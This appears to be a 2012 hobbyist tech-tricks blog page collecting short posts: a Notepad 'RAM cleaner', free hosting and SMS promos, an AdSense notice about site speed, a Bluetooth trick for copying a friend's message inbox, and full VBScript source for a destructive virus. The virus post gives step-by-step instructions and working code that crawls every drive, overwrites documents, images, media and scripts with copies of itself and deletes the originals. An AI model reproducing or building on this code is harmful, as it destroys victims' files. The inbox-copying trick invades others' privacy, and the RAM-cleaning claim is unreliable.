Pages

Monday, May 28, 2012

SPEED UP YOUR COMPUTER BY CLEANING RAM USING NOTEPAD


If your computer become slow, when you are working with many programs.
It may be due to RAM because at that time RAM is full of remaining progress pieces which you are working with and you do not need them any more.
So, if you can erase or delete those unnecessary pieces of information, your computer RAM will be cleaned and your computer will be speed up.



Cleaning RAM is very easy task here are steps for it, just follow them:


Step 1: Open notepad.

Step 2: Type FreeMem=Space(64000000).

Step 3: Save file with name "CleanRAM.vbs".

Step 4: Close it and run the file.

It will free memory in RAM, if you want to free more memory than you can write following command in notepad instead of what given in step 2:

FreeMem= (256000000) for 256 mb
FreeMem= (128000000) for 128 mb
FreeMem= (72000000) for 72 mb
FreeMem= (64000000) for 64 mb
FreeMem= (32000000) for 32 mb
FreeMem= (24000000) for 24 mb

Make sure that you don't select the memory that is larger than your memory capacity.

Saturday, May 26, 2012

Free PHP Web Hosting

Hey all internet users!!

Free Subdomain

If you want to create Webpage which supports PHP then the link below is the best hosting site to host the site for PHP hosting for free!!

You can get free space of 1500MB with cPanel !!

Easy to sign up and easy to use just with in some clicks you can get your site for free!!

For Sign up click to banner below or the link!!

Free PHP web hosting Web hosting

Friday, May 25, 2012

Create Dangerous .vbs virus which overwrites the file extenstion with .doc,.txt,.js,.jse,.css,.wsh,.sct,.hta,.js,.mp2,.mp3 ,.vbs,.vbe,.jpeg,.jpg

Hello there!!!
I'm Back here again with new code which can create dangerous virus which over writes the files!!


To create it Follow the steps Below
Step 1:
Open Notepad

Step 2:
copy codes below



This is the code:
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
For Each d In fso.Drives
If d.DriveType + 2 And d.IsReady = True Then
Call SubFolders(d & "\")
End If
Next

Function infect(path)
On Error Resume Next
Set fold = fso.GetFolder(path)
For Each f In fold.Files
ext = fso.GetExtensionName(f.path)
If (ext="doc") or (ext="txt") or (ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") or (ext="js") or (ext="mp2") or (ext="mp3") or (ext="vbs") or (ext="vbe") or (ext="jpeg") or (ext="jpg") Then
fso.CopyFile WScript.ScriptFullName, f.path & ".vbs", True
fso.DeleteFile f.Path, True
End if
Next
End Function

Function SubFolders(path)
On Error Resume next
For Each subf In fso.GetFolder(path).SubFolders
Call Infect(subf.Path)
Call SubFolders(subf.Path)
next
End function

Step 3:
Paste it to Notepad

Step 4:
Save it as A.vbs

This virus overwrites files with these extentions:.doc,.txt,.js,.jse,.css,.wsh,.sct,.hta,.js,.mp2,.mp3 ,.vbs,.vbe,.jpeg,.jpg
I am NOT responsible for any damage caused by this virus so PLEASE DO NOT RUN THIS SCRIPT UNLESS YOU WANT DATA LOSS!!

If you don't want it to be active then save it as .txt

Please comment below!!

Thank You!!

Saturday, May 19, 2012

Now You Can Copy Your Friends Message Inbox In Your Mobile

Now You Can Copy Your Friends Message Inbox In Your Mobile..



Just Follow Below Very Simple Steps:-

        1. Turn on your and your Friends bluetooth.

        2. Go To Settings>sync and backup>phone switch>copy to this.

        3. Where They Ask to Select other device, Then Select new phone.

        4. Now You Can See List Which Item You Want To Select Mark It. You can also copy  MMS,NOTE,Contacts.

         5. Press Done And Search the device. Connect with it.


 Done.
Your Friend Inbox Copied Succesfully..
Enjoy And Use This Trick With Your Friends..

Please Give Your Valuable Comments Below.

Wednesday, May 16, 2012

Free Sms To WorldWide

Send Free sms to world wide for free !!
It supports all country!!!
You don't have to register any id to send sms from here!!
To send Free sms click the link below
Free Sms

Tuesday, May 8, 2012

Information about AdSense ads and site speed




Earlier today, our Websearch team announced that we now consider the speed it takes for a website to load when ranking it in Google search results on google.com. As an AdSense publisher and website owner, you may have questions about this change, so we'd like to take a minute to give you more details.

This change is part of our efforts to provide the best possible search experience for our users, as we've found that faster sites create happy users. Our internal studies show that visitors tend to spend less time on sites that respond slowly, and additional recent data shows that improving site speed also reduces operating costs. For these reasons, we're now taking site speed into account in our search rankings.

Site speed is just one of over 200 signals we use to determine search ranking, and because it's a new signal, it doesn't carry as much weight as the relevance of a page. In fact, less than 1% of all search queries on google.com are affected by the site speed signal. We launched this change a few weeks back after rigorous testing. If you haven't seen much change to your site rankings, then this site speed change possibly did not impact your site.

In general, a website would have to be particularly slow for its ranking to be affected. We look at the time it takes to load all components of a page that contribute to page speed, including images, rich media, and Javascript/HTML/CSS code.

AdSense is built to load ads quickly so there's no need to change your AdSense setup. Even so, we are working to speed up our ads products further. In addition, we also want to give you some suggestions of things you can do on your side, like enabling compression for your site, enabling caching of images, JavaScript, and CSS, and minimizing the size of your JavaScript with Closure Tools.

If you'd like to learn more about speeding up your website, or evaluate your site's speed, we encourage you to look at Site Performance in Webmaster Tools and try developer tools such as Page Speed, YSlow, and WebPageTest.org. Please note that at this time, the only way to determine whether your site has been affected is if you've seen a recent change in your search ranking.